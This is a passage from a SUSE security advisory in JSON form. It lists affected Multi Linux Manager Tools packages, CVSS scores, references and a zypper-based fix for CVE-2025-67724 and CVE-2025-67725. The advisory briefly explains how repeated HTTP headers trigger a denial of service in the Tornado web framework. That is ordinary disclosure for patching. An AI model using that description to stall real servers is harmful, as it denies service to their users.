"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:dracut-saltboot-1.1.0-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:dracut-wireless-0.1.1595937550.0285244-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-bash-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-lang-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-zsh-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-30T11:21:20Z",
"details": "moderate"
}
],
"title": "CVE-2025-67724"
},
{
"cve": "CVE-2025-67725",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-67725"
}
],
"notes": [
{
"category": "general",
"text": "Tornado is a Python web framework and asynchronous networking library. In versions 6.5.2 and below, a single maliciously crafted HTTP request can block the server\u0027s event loop for an extended period, caused by the HTTPHeaders.add method. The function accumulates values using string concatenation when the same header name is repeated, causing a Denial of Service (DoS). Due to Python string immutability, each concatenation copies the entire string, resulting in O(n^2) time complexity. The severity can vary from high if max_header_size has been increased from its default, to low if it has its default value of 64KB. This issue is fixed in version 6.5.3.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Multi Linux Manager Tools Beta SLE-15:dracut-saltboot-1.1.0-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:dracut-wireless-0.1.1595937550.0285244-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgr-push-5.2.3-159000.2.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-bash-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-lang-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-zsh-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-defusedxml-0.7.1-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-mgr-push-5.2.3-159000.2.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-rhnlib-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-spacewalk-client-tools-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:spacecmd-5.2.6-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:spacewalk-client-tools-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:supportutils-plugin-salt-1.2.3-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:supportutils-plugin-susemanager-client-5.2.2-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:dracut-saltboot-1.1.0-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:dracut-wireless-0.1.1595937550.0285244-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-bash-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-lang-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-zsh-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-67725",
"url": "https://www.suse.com/security/cve/CVE-2025-67725"
},
{
"category": "external",
"summary": "SUSE Bug 1254905 for CVE-2025-67725",
"url": "https://bugzilla.suse.com/1254905"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Multi Linux Manager Tools Beta SLE-15:dracut-saltboot-1.1.0-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:dracut-wireless-0.1.1595937550.0285244-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgr-push-5.2.3-159000.2.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-bash-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-lang-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-zsh-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-blackbox_exporter-0.26.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:prometheus-postgres_exporter-0.10.1-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-defusedxml-0.7.1-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-mgr-push-5.2.3-159000.2.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-rhnlib-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-spacewalk-client-tools-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:python3-uyuni-common-libs-5.2.3-159000.2.3.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:spacecmd-5.2.6-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:spacewalk-client-tools-5.2.4-159000.4.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:supportutils-plugin-salt-1.2.3-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:supportutils-plugin-susemanager-client-5.2.2-159000.4.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:venv-salt-minion-3006.0-159000.5.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:Multi-Linux-ManagerTools-Beta-SLE-Micro-release-5-159000.3.3.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:dracut-saltboot-1.1.0-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:dracut-wireless-0.1.1595937550.0285244-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-5.2.5-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-bash-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-lang-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:mgrctl-zsh-completion-5.2.5-159000.2.3.2.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-Micro-5:venv-salt-minion-3006.0-159000.5.3.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Multi Linux Manager Tools Beta SLE-15:dracut-saltboot-1.1.0-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:dracut-wireless-0.1.1595937550.0285244-159000.2.2.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:firewalld-prometheus-config-0.1-159000.4.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-QubitProducts-exporter_exporter-0.4.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-boynux-squid_exporter-1.13.0-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-lusitaniae-apache_exporter-1.0.10-159000.2.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-alertmanager-0.28.1-159000.12.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-node_exporter-1.9.1-159000.4.2.1.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:golang-github-prometheus-prometheus-3.5.0-159000.4.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.ppc64le",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.s390x",
"SUSE Multi Linux Manager Tools Beta SLE-15:grafana-11.6.11-159000.2.3.2.x86_64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgr-push-5.2.3-159000.2.3.1.noarch",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.aarch64",
"SUSE Multi Linux Manager Tools Beta SLE-15:mgrctl-5.2.5-159000.2.3.2.ppc64le",
